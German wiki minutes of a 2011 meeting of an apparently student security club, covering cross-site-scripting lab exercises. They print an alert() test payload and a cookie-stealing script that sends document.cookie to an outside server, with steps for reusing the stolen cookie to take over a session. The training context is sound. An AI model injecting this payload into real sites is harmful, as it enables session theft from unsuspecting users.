CInsects/Protokolle/CInsects:Treffen-2011-01-11: Unterschied zwischen den Versionen

Aus Fachschaft_Informatik
Zur Navigation springen Zur Suche springen
Keine Bearbeitungszusammenfassung
 
(Eine dazwischenliegende Version von einem anderen Benutzer wird nicht angezeigt)
Zeile 14: Zeile 14:


Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.
Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.
Hackits [http://mercarion-online.de/test/CInsects/] Achtung! bitte keine Scripts verwenden, die Brwoser andere Nutzer unbrauchbar machen (s.o. unter nasty shit). Wenn eine solcher Hack drinn ist, könnt ihr (0rokita) bescheidsagen, er löscht die dann.


== Statistik ==
== Statistik ==
Zeile 20: Zeile 22:


L33tness-Faktor der Kekse: 100%
L33tness-Faktor der Kekse: 100%


== Themen für das nächste mal ==
== Themen für das nächste mal ==


FIXME
FIXME und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.
und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.

Aktuelle Version vom 12. Januar 2011, 15:10 Uhr

Diese Seite ist eine Unterseite von CInsects.

Heute haben wir uns mit XSS (Cross-Site-Scripting:Wikipedia) befasst.

Hackits[Bearbeiten]

Nils hat zwei Hackits auf die Beine gestellt, das eine, recht einfach, stellte uns ein Formularfeld zur Verfügung und gab den eingegebenen Text auf einer neuen Seite aus. Hier konnte jeder JavaScript Text eingefügt werden, z.B.

  <script> type="text/javascript">alert("Achtung hier wird eine XSS Angriff durchgeführt");</script> 

was dazu führt, das auf der ausgebenden Seite eine Meldung mit eingegebenen Text erschien. Kaputmachen konnte man hier also noch nichts, es sei denn den eigenen Rechner.

Das zweite Hackit war ein wenig interessanter. Hier bestand die Möglichkeit sich mit Name und Kennwort anzumelden und dann über ein Nachrichten System Meldungen an andere Mitglieder zu senden. Diese Meldungen konnten natürlich JavaScript beinhalten, sodass wir damit anfangen konnten die Cookies (KEEEKSE!!! omnomnom) anderer Nutzer zu klauen.

  <script>document.write('<img src="http://cinsects.de/cookie?' +document.cookie+'">');</script>

Mit diesem Script konnten wir den Cookie desjenigen auslesen, der die Nachricht bekommen hat und haben diesen in eine nicht existierende Datei auf einem Server für den wir Rechte haben geschickt. In der Fehlerkonsole dieses Servers wurde der Cookie nun angezeigt, und musste von uns nur noch als eigener Cookie in FF eingelesen werden.

Natürlich war auch viel nasty shit möglich, wie aufpoppende Meldungen in einer while Schleife mit 1=1 als Bedingung, sodass der Brwoser neu gestartet werden musste.

Hackits [1] Achtung! bitte keine Scripts verwenden, die Brwoser andere Nutzer unbrauchbar machen (s.o. unter nasty shit). Wenn eine solcher Hack drinn ist, könnt ihr (0rokita) bescheidsagen, er löscht die dann.

Statistik[Bearbeiten]

Anzahl der anwesenden Personen: Start(8) Ende(9)

L33tness-Faktor der Kekse: 100%


Themen für das nächste mal[Bearbeiten]

FIXME und daran zu denken, jemanden zu bestimmen, der Kekse mitbringt.